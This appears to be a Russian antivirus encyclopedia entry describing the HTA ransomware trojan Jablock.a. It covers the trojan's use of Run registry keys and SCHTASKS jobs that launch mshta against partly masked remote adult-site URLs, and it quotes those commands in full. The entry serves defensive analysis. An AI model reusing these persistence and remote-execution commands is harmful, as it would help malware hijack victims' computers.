Security Lab

Trojan-Ransom.HTA. Jablock.a

Trojan-Ransom.HTA. Jablock.a

Троянская программа, блокирующая нормальную работу компьютера с целью получить выкуп за восстановление исходного состояния системы.

Троянская программа, блокирующая нормальную работу компьютера с целью получить выкуп за восстановление исходного состояния системы. Является HTML-приложением (HTA), содержащим сценарий языка Visual Basic. Имеет размер 4923 байта.


name="doc3">

Деструктивная активность

После запуска троянец выполняет следующие действия:

  • каждые 10 секунд открывает в своем окне ссылку: 
    http://sph1uea***exadult.com/pc/page/player_view.php?
    code=&cuid=a20f5f7b6034cb6bbbb2503c7357643f3f11b837
  • Создает следующие ключи системного реестра: 
    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "start_a20f5f7b6034cb6bbbb2503c7357643f3f11b837_166" = 
    "%System%\mshta http://sph1uea***exadult.com/pc/page/
    player_view.php?code=&cuid=a20f5f7b6034cb6bbbb2503c
    7357643f3f11b837"
    "start_a20f5f7b6034cb6bbbb2503c7357643f3f11b837_167" 
    = "%System%\mshta http://seyp1g***exadult.com//pc/page
    /player_view.php?code=&cuid=a20f5f7b6034cb6bbbb2503c
    7357643f3f11b837"
    "start_a20f5f7b6034cb6bbbb2503c7357643f3f11b837_168" = 
    "%System%\mshta http://sea6ayp***isexadult.com/pc/page
    /player_view.php?code=&cuid=a20f5f7b6034cb6bbbb2503c
    7357643f3f11b837"
    Таким образом, при каждом следующем старте системы посредством системной утилиты "MSHTA.EXE" будут запускаться HTML-приложения, расположенные по адресам: 
    http://sph1uea***exadult.com/pc/page/player_view.php?
    code=&cuid=a20f5f7b6034cb6bbbb2503c7357643f3f11b837
    http://seyp1g***exadult.com//pc/page/player_view.php?
    code=&cuid=a20f5f7b6034cb6bbbb2503c7357643f3f11b837
    http://sea6ayp***isexadult.com/pc/page/player_view.php?
    code=&cuid=a20f5f7b6034cb6bbbb2503c7357643f3f11b837
    На момент создания описания работала только первая ссылка. По ней загружалось приложение, отображающее в правом нижнем углу экрана окно следующего вида:

  • Проверяет версию Windows, установленную на зараженном компьютере. Если она соответствует Windows Server 2003, Windows XP 64-bit Edition, Windows XP Professional x64 Edition, Windows Home Server, Windows Vista, Windows Server 2008, Windows 7, то троянец запускает следующие команды: 
    SCHTASKS /Create /TN start_a20f5f7b6034cb6bbbb2503c7357643f3f11
    b837_166 /TR "%System%\mshta http://sph1uea***exadult.com/pc/page/player_view.php?
    code=&cuid=a20f5f7b6034cb6bbbb2503c7357643f3f11b837" 
    /SC MINUTE /MO 5 /F" 
    SCHTASKS /Create /TN start_a20f5f7b6034cb6bbbb2503
    c7357643f3f11b837_167 /
    TR "%System%\mshta http://seyp1g***exadult.com//pc/
    page/player_view.php?code=&cuid=a20f5f7b6034cb6bbbb25
    03c7357643f3f11b837" 
    /SC MINUTE /MO 5 /F"
    SCHTASKS /Create /TN start_a20f5f7b6034cb6bbbb2503c7357643f3f11b837_168 /TR 
    "%System%\mshta http://sea6ayp***isexadult.com/pc/page
    /player_view.php?code=&cuid=a20f5f7b6034cb6bbbb2503c7
    357643f3f11b837" /SC MINUTE /MO 5 /F"
    Таким образом, при помощи утилиты "SCHTASKS.EXE" в расписании создаются задания, согласно которым каждые 5 минут будут запускаться HTML-приложения, расположенные по вышеупомянутым ссылкам.

    В случае установленной Windows XP, будут запускаться команды: 

    SCHTASKS /Create /RU system /TN start_a20f5f7b6034cb6bbbb2503c7357643f3f11b837
    _166/TR "%System%\mshta http://sph1uea***
    exadult.com/
    pc/page/player_view.php?code=&cuid=a20f5f7b6034cb6bbbb2503c7357643f3f1
    1b837" /SC MINUTE /MO 5"
    SCHTASKS /Create /RU system /TN start_a20f5f7b6034cb6bbbb2503c7357643f3f11b837
    _167 /TR "%System%\mshta http://seyp1g***
    exadult.com//pc/
    page/player_view.php?code=&cuid=a20f5f7
    b6034cb6bbbb2503c7357643f3f11b837" 
    /SC MINUTE /MO 5"
    SCHTASKS /Create /RU system /TN start_a20f5f7b6034cb6bbbb2503c7357643f3f11b837
    _168 /TR "%System%\mshta http://sea6ayp***
    isexadult.com/pc
    /page/player_view.php?code=&cuid=a20f5f7b6034cb
    6bbbb2503c735764
    3f3f11b837" 
    /SC MINUTE /MO 5"
  • Запускает Windows Media Player (процесс "WMPLAYER.EXE") с параметром: 
    http://bur***xadult.com/movie/sample_1.wmv
    На момент создания описания по данной ссылке загружался файл размером 993794 байта. Файл представляет собой видеоролик порнографического содержания.
  • Открывает в новом окне ссылку: 
    http://sph1uea***exadult.com/pc/page/allot.php?
    code=&cuid=a20f5f7b6034cb6bbbb2503c7357643f3
    f11b837&ckg=on&ln=/movie_list

Квантовый кот Шрёдингера ищет хозяина!

Живой, мертвый или в суперпозиции? Узнайте в нашем канале

Откройте коробку любопытства — подпишитесь